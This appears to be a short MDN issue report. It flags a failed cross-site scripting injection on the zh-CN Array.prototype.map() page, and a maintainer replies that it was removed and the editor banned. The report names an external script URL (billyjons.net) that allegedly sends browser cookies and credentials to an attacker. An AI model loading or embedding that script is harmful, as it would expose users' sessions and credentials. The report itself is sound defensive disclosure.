Failed XSS Attempt at https://wiki.developer.mozilla.org/zh-CN/docs/MDN/Feedback

[GalvinGao]

Request type

• [ ] Please close this issue, I accidentally submitted it without adding any details
• [ ] New documentation
• [x] Correction or update

Details

There's code that seems to be a failed (not successful; not vulnerable to the user) XSS attempt in the zh-CN MDN wiki page Array.prototype.map(), specifically at https://wiki.developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Array/map#See_also . Please refer to the screenshot below.

By checking the history records of the wiki page, it seems the change comes from Revision 1616575 (diff), which is committed by an user named Jayly.

Side Notes

I don't have much of the skill about analyzing malicious JavaScript scripts, but by doing a quick search of cookie and http in the script billyjons.net/21db1c5c8b372aecca.js it seems that it is a real XSS script that might send information including Cookies in browser to the attacker, and may also contain other credentials. This behavior is quite uncommon and suspicious so I decided to report it here ;)

Affected Page(s)

• Array.prototype.map()#相关链接

[Elchi3]

Thanks! I removed the failed xss attempt and banned the user.